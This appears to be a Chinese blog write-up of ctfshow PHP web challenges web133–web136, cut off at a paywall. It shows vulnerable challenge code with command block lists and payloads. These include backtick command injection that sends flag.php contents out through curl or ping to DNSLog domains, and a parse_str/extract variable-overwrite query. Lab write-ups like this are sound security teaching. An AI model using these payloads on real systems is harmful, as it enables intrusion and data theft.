ctfshow web入门 PHP特性后篇(web133-web150)

最新推荐文章于 2024-10-07 19:57:00 发布
最新推荐文章于 2024-10-07 19:57:00 发布
阅读量1.9k 收藏 3
点赞数 4
文章标签: php web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ccfly1012/article/details/120273775
版权
本文详细介绍了在CTF比赛中遇到的一系列基于PHP的Web安全题目,涵盖了curl使用、函数利用、关键字禁用情况下的命令执行、函数调用技巧等多个方面,通过具体的payload展示了解题思路和方法。
摘要由CSDN通过智能技术生成

目录

web133

web134

web135

web136

web137

web138

web139

web140

web141

web142

wen143

web144

web145-web150

web133

error_reporting(0);
highlight_file(__FILE__);
//flag.php
if($F = @$_GET['F']){
    if(!preg_match('/system|nc|wget|exec|passthru|netcat/i', $F)){
        eval(substr($F,0,6));
    }else{
        die("6个字母都还不够呀?!");
    }
}

这个题我做了好几遍终于学会了

error_reporting(0);
highlight_file(__FILE__);
//flag.php
if($F = @$_GET['F']){
    if(!preg_match('/system|nc|wget|exec|passthru|netcat/i', $F)){
        eval(substr($F,0,6));
    }else{
        die("6个字母都还不够呀?!");
    }
}

所以我们的目标就明确了,利用curl去带出来flag.php

首先在DNSLog Platform这个网站先创建一个域名

然后payload

?F=`$F`;空格curl`cat flag.php|grep "flag"`.当时创建的域名

然后再刷新,得到flag

web134

 <?php
​
/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date:   2020-10-13 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-10-14 23:01:06
​
*/
​
highlight_file(__FILE__);
$key1 = 0;
$key2 = 0;
if(isset($_GET['key1']) || isset($_GET['key2']) || isset($_POST['key1']) || isset($_POST['key2'])) {
    die("nonononono");
}
@parse_str($_SERVER['QUERY_STRING']);
extract($_POST);
if($key1 == '36d' && $key2 == '36d') {
    die(file_get_contents('flag.php'));
}

parse_str()函数

把查询字符解析到变量

ectract()函数

从数组中将变量导入当前的符号表
php变量覆盖 利用点是 extract($_POST); 进行解析$_POST数组。 先将GET方法请求的解析成变量,然后在利用extract() 函数从数组中将变量导入到当前的符号表。

payload:

?_POST[key1]=36d&_POST[key2]=36d

web135

<?php
​
/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date:   2020-10-13 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-10-16 18:48:03
​
*/
​
error_reporting(0);
highlight_file(__FILE__);
//flag.php
if($F = @$_GET['F']){
    if(!preg_match('/system|nc|wget|exec|passthru|bash|sh|netcat|curl|cat|grep|tac|more|od|sort|tail|less|base64|rev|cut|od|strings|tailf|head/i', $F)){
        eval(substr($F,0,6));
    }else{
        die("师傅们居然破解了前面的,那就来一个加强版吧");
    }
}

payload:

?F=`$F` ;cp flag.php 2.txt;
?F=`$F` ;uniq flag.php>4.txt;
?F=`$F` ;ping `awk '/flag/' flag.php`.oywkie.dnslog.cn

web136

 <?php
error_reporting(0);
function check($x){
    if(preg_match('/\\$|\.|\!|\@|\#|\%|\^|\&
最低0.47元/天 解锁文章
parkour-
关注
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
ctf.show的PHP特性(web89-web150)
热门推荐
wanan的博客
09-03 2万+
ctf.show的PHP特性(web89-web150)
ctf.show-web13
最新发布
2301_79210256的博客
10-07 384
先上传.user.ini文件中的内容, 文件中内容是auto_prepend_file=1.txt。函数这行代码时,它会打印出当前目录下所有文件和目录的列表。auto_prepend_file将文件内容包含在每个脚本执行之前执行。auto_append_file将文件内容包含在每个脚本执行之后之后。.user.ini文件是一个可选的配置文件,它允许开发者和用户在不修改主。函数用于显示一个文件的内容,同时对 PHP 代码进行语法高亮。文件的情况下自定义 PHP 设置,可以覆盖或添加全局。
ctfshow web133和其他命令执行的骚操作
Firebasky的博客
10-15 4795
这里是总结自己最近遇到的命令执行题,感觉还是不错分享出来。也欢迎师傅们评论一些骚操作 1. ISITDTU QUALS 2020 REC <?php // error_reporting(E_ALL); // ini_set('display_errors', '1'); function trigonometric_check($code) { // Check length if (strlen($code) >= 0x100) {//256长度 retu.
CTFshow php特性 web133
Kradress的博客
12-17 2338
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: Firebasky # @Date: 2020-10-13 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-10-13 16:43:44 */ error_reporting(0); highlight_file(__FILE__); //flag.php if($F = @$_GET['F']
ctfshow web入门 php特性 web131-web135
m0_62207170的博客
10-05 719
ctfshow web入门 php特性 web131-web135
ctfshow--web入门web101--web115&web123&web125-web133
qing_chuan_的博客
06-08 1124
v2$v3反射,通俗来讲就是可以通过一个对象来获取所属类的具体内容,php中内置了强大的反射API:ReflectionClass:一个反射类,功能十分强大,内置了各种获取类信息的方法,创建方式为new ReflectionClass(str 类名),可以用echo new ReflectionClass(‘className’)打印类的信息。ReflectionObject:另一个反射类,创建方式为new ReflectionObject(对象名)。
巨量引擎-抖音上的80后、90后、00后 之 00后篇-2019.8-15页.pdf
09-15
### 巨量引擎-抖音上的80后、90后、00后 之 00后篇 #### 数据背景及方法论 本报告由巨量引擎商业算数中心出品,旨在通过分析2018年12月至2019年6月期间的数据来深入探讨抖音平台上00后用户的兴趣爱好、行为习惯...
python标准库学习(后篇
02-26
执行已编译的代码execfile("hello.py")defEXECFILE(filename,locals=None,globals=None):execcompile(open(filename).read(),filename,"exec")inlocals,globalsEXECFILE("hello.py")...
软件工程课程资料-后篇
06-18
在本压缩包中,我们聚焦于“软件工程”的后篇,涵盖了从软件实现到软件维护,以及面向对象方法的相关知识。这些内容对于理解和实践软件开发过程至关重要,是软件工程课程的核心部分。 首先,"第7章 软件实现.ppt"会...
毕业论文:光伏并网发电系统-后篇
05-23
完整优秀的毕业论文“光伏并网发电系统”设计,当时制作出实际样品进行演示,内涵流程图\软件\算法公式、源程序设计、 ...因页数比较多,特意拆成前篇、中篇、后篇发布;需要的请下全三篇文档,保你满意!
ctfshow web13-14
qq_61988806的博客
12-12 1119
ctfshow web13-14 文件上传的题 想办法搞到源码 常见得到源码的方法 .bak .git .hg 这里使用.bak得到源码 下载得到源码
ctfshow-web入门-php特性web132-web136)
Welcome To Myon'Blog !
07-25 1560
mt_rand(1, 0x36D) 会生成一个 1 到 877(十六进制0x36D)的随机数,因此 $code === mt_rand(1,0x36D) 这个条件很难满足,因为每次都会生成一个新的随机数,$code 很难与这个随机数相等。tr -cd 'a-zA-Z0-9-' 这个命令会删除所有不是字母、数字、减号的内容,原本我想将大括号也保留,但是试了下不行。flag 分为了两段,flag1 和 flag2,拼接起来,字母都改成小写字母,添加上大括号即可。
CTFshow php特性 web135
Kradress的博客
12-17 1148
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: Firebasky # @Date: 2020-10-13 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-10-16 18:48:03 */ error_reporting(0); highlight_file(__FILE__); //flag.php if($F = @$_GET['F']
CTF_ctfshow_web13_文件上传漏洞
weixin_54227009的博客
05-14 1538
打开靶机发现是个文件上传漏洞,上传了图片这些,都提示太大了 10344c8d-1054-45ac-ac38-f99ae5d4e476.challenge.ctf.show/upload.php.bak 然后upload.php.bak下载下来了源码,进行审计: <?php header("content-type:text/html;charset=utf-8"); $filename = $_FILES['file']['name']; $temp_name = $_...
CTFshow——PHP特性(下)
D.MIND 的博客
02-21 2388
目录:web132——逻辑运算符的优先级web133——curl -Fweb134——php变量覆盖web135—— >xx.txt 写文件web136—— tee命令 web132——逻辑运算符的优先级 打开是一个网站,访问robots.txt 得到指引/admin <?php #error_reporting(0); include("flag.php"); highlight_file(__FILE__); if(isset($_GET['username']) &&
ctfshow web入门 php特性 web123--web139
2301_81040377的博客
04-06 1094
web133一样的东西但是我们的grep被过滤了,所以得思考一下怎么才行,但是反斜杠引号什么的没过滤,就可以用来绕过。拼接一下ctfshow{25b598bc-5a5b-4baf-a23e-2c4e9dea9d8f}必须传CTF_SHOW,CTF_SHOW.COM 不能有fl0g。就可以绕过对**isset($fl0g)**的判断,用+代表空格。先点击左边的获得域名,然后传参之后再点击右边的刷新结果。他这里对这个就讲的特别详细了,我抄一下。然后我们就可以进行类似的构造。就用argv的方法来写。
ctfshow-萌新-web13( 利用代码执行漏洞获取网站敏感文件)
wangyuxiang946的博客
09-11 1万+
ctf.show萌新模块 web13关, 这一关的考点是代码执行漏洞, 需要灵活的运用各种命令执行函数, 源码中过滤了system, exec, highlight函数, cat命令, congfig, php, 点和分号等关键字, 推荐使用反引号`` 进行绕过 页面中展示了部分源码, 并提示 flag 就在 config.php 文件中 源码中过滤了参数中的 system exec highlight cat . ; file php config 等关键字, 这里可以使用 pass...
ctfshow php特性[125-135]
weixin_44770698的博客
01-16 1253
ctfshow php特性125-135
ctfshow web134
08-09
根据引用和引用的信息,可以得知在web134中存在一个名为ctfshow的类。根据引用中的代码,ctfshow类中有一个静态方法getFlag(),该方法会输出flag.php文件的内容。根据引用中的代码,也可以通过调用ctfshow类来执行相应的操作。因此,在web134这个环境中,可以通过调用ctfshow::getFlag()来获取flag.php文件的内容。123 #### 引用[.reference_title] - *1* *3* [CTFshow——PHP特性(下)](https://blog.csdn.net/weixin_45669205/article/details/113857983)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *2* [ctfshow web入门 PHP特性后篇(web133-web150)](https://blog.csdn.net/ccfly1012/article/details/120273775)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值